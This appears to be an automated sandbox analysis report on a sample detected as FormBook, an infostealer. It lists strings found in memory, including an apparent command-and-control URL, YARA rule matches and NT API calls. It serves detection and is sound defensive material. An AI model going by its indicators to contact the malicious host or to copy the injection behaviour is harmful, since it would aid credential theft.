          Source: explorer.exe, 00000006.00000003.32855740059.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961405842.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230855468.000000000CA94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961045545.000000000CA7F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com?
          Source: explorer.exe, 00000006.00000000.30297542388.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000009263000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.come
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://scishow-tangents.simplecast.com/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://stacker.com/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://weathermapdata.blob.core.windows.net/static/finance/1stparty/FinanceTaskbarIcons/Finance_Sto
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000003.31961405842.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967028878.000000000CA4B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230855468.000000000CA94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229091915.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.32856007373.000000000CA62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967931569.000000000CAB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961045545.000000000CA7F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230740761.000000000CA4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000006.00000002.35235825828.00000000135EF000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35221616070.0000000005C5F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.84031.vip/cr12/?XDHHT=HbnK0Ul5FZTLHgSdQ
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.liveabout.com/worst-war-films-of-all-time-3438702
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/big-bang-theory-fans-congratulate-kaley-cuoco-as-she-an
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/i-ll-admit-i-blew-it-michael-richards-talks-kramer-viet
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/how-to-look-fabulous-after-60-without-trying-to-l
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/shopping/the-21-best-walking-shoes-to-wear-wherever-you-go/ss-AA
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/the-opaque-investment-empire-making-openai-s-sam-altman-ri
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a33k6h
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a3oxnm
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a6qja2
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/other/scammer-alert-if-someone-calls-you-using-any-of-these-12-phras
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/upgrading-your-home-don-t-waste-your-money-on-these-7-ren
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/topstocks/costco-makes-huge-change-shares-news-on-membership-fee-inc
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/movies/news/netflix-users-celebrate-as-2023-masterpiece-finally-debuts-onl
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/movies/news/the-best-war-movies-of-all-time-based-on-ratings-and-no-1-is-n
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/movies/news/the-summer-box-office-is-flopping-and-quiet-place-bad-boys-rid
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/movies/news/trump-judge-faces-a-serious-problem-if-court-returns-guilty-ve
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/2-handguns-35-shell-casings-recovered-in-fatal-overnight-shooti
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/colorado-man-s-silver-chain-saves-his-life-after-bullet-becomes
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/what-is-donald-trump-s-net-worth/ar-BB1hFO7Z
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/israel-gaza-updates-blinken-tells-israel-onus-is-on-hamas-to-ac
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/north-korea-says-it-will-stop-sending-trash-balloons-as-south-k
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nba/the-mavs-passed-on-isiah-thomas-in-the-1981-draft-because-of-hi
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/video/peopleandplaces/top-10-catchiest-songs-of-the-2010s/vi-BB1j6YDZ
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Atlanta%2CGeorgia?loc=eyJsIjoiQXRsYW50YSIsInIiOiJHZW9y
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/hourlyforecast/in-Atlanta%2CGeorgia?loc=eyJsIjoiQXRsYW50YSIsInIiOi
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.newyorker.com/culture/richard-brody/the-worst-thing-about-birth-of-a-nation-is-how-good-
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.patreon.com/scishow
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.techspot.com/review/2821-amd-ryzen-7800x3d-7900x3d-7950x3d/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/watch?v=cbN37yRV-ZY

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.35236192272.0000000013989000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: yPURXYpFVuXra2o.exe PID: 2392, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: yPURXYpFVuXra2o.exe PID: 7124, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cscript.exe PID: 4960, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          .NET source code contains very large array initializations
          Source: 3.2.yPURXYpFVuXra2o.exe.2febbdc.6.raw.unpack, .csLarge array initialization: : array initializer size 28702
          Source: 3.2.yPURXYpFVuXra2o.exe.74f0000.13.raw.unpack, .csLarge array initialization: : array initializer size 28702
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041A360 NtCreateFile,5_2_0041A360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041A410 NtReadFile,5_2_0041A410
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041A490 NtClose,5_2_0041A490
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041A540 NtAllocateVirtualMemory,5_2_0041A540
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041A48A NtClose,5_2_0041A48A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041A53A NtAllocateVirtualMemory,5_2_0041A53A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018429F0 NtReadFile,LdrInitializeThunk,5_2_018429F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01842B90
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_01842BC0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_01842B10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842A80 NtClose,LdrInitializeThunk,5_2_01842A80
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_01842DA0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01842DC0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_01842D10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842CF0 NtDelayExecution,LdrInitializeThunk,5_2_01842CF0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842C30 NtMapViewOfSection,LdrInitializeThunk,5_2_01842C30
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_01842C50
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842F00 NtCreateFile,LdrInitializeThunk,5_2_01842F00
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842EB0 NtProtectVirtualMemory,LdrInitializeThunk,5_2_01842EB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842ED0 NtResumeThread,LdrInitializeThunk,5_2_01842ED0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842E50 NtCreateSection,LdrInitializeThunk,5_2_01842E50
